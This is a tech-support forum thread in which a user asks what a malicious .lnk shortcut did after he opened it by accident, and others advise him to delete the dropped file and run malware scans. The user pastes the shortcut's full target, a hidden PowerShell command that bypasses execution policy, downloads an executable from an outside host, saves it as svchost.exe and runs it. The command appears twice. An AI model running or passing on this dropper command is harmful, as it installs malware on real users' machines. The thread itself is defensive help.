Help with a Windows PowerShell shortcut

[Pterodacton]

Hello all.

I found a zipped video file on my iPhone, don't remember downloading it, inside was a file with the extension of shortcut, the shortcut leads to Windows PowerShell, long story short I double clicked the shortcut by accident, nothing seemed to happen but my harddrive made some noise like it was doing something, I'm suspecting the worst at the moment but was wondering, how do I see what the shortcut did? Could it have run something on my computer? I'm presuming whatever it was, it wasn't good. 

Thanks in advance. 

[Gravemind]

Check the properties of the shortcut and see where the destination is.

[Naeaes]

Shortcut? as in a .lnk file? Right-click it, pick properties and take a look at the field labeled "Target:" 

[SecGuy]

What was the file extension?  If it was .ps1 it is a PowerShell script, highly suggest looking at it and posting the code in a <code>code</code> element. 

[Pterodacton]

Yep it's a .lnk file. 

 

The target box has this written in it...

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cdn.che.moe/kyvept.exe','%APPDATA%\svchost.exe');Start-Process '%APPDATA%\svchost.exe'

I browse 4chan, am I screwed?
 

[SecGuy]

12 minutes ago, Pterodacton said:

Yep it's a .lnk file. 

 

The target box has this written in it...

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cdn.che.moe/kyvept.exe','%APPDATA%\svchost.exe');Start-Process '%APPDATA%\svchost.exe'

I browse 4chan, am I screwed?
 

That's not good...  Go to the appdata folder and delete SVhost.exe, it will probably be running, so use something like FileAssassin. Then run something like malwarebytes and see if it left over any registry keys.  Do this quickly, you don't know what it is doing, C&C?  Someone could be keylogging, downloading files or whatever right now.  Delete that file first. https://www.malwarebytes.com/fileassassin/ 

 

Might be worth running some scans with software like TDSS killer etc afterwards.  But do this, QUICKLY!!! GOGOGO!!

[Pterodacton]

Deleted the file, I don't think it was running, scanning now with TDSS killer, thanks for your quick reply.

 

EDIT: Nothing was found with TDSS killer.

 

Anything else I could do to double check everythings A-OK?

[SecGuy]

31 minutes ago, Pterodacton said:

Deleted the file, I don't think it was running, scanning now with TDSS killer, thanks for your quick reply.

 

EDIT: Nothing was found with TDSS killer.

 

Anything else I could do to double check everythings A-OK?

Yes, hey. 

 

You could run something like Emsisoft Emergency Kit and check for any left over malware.  But even if it's not running can be a bad sign, it could have dropped something. Run EEK to make sure it's all alright https://www.emsisoft.com/en/software/eek/

 

 

[Pterodacton]

Okay downloading now, Malwarebytes turned up nothing also.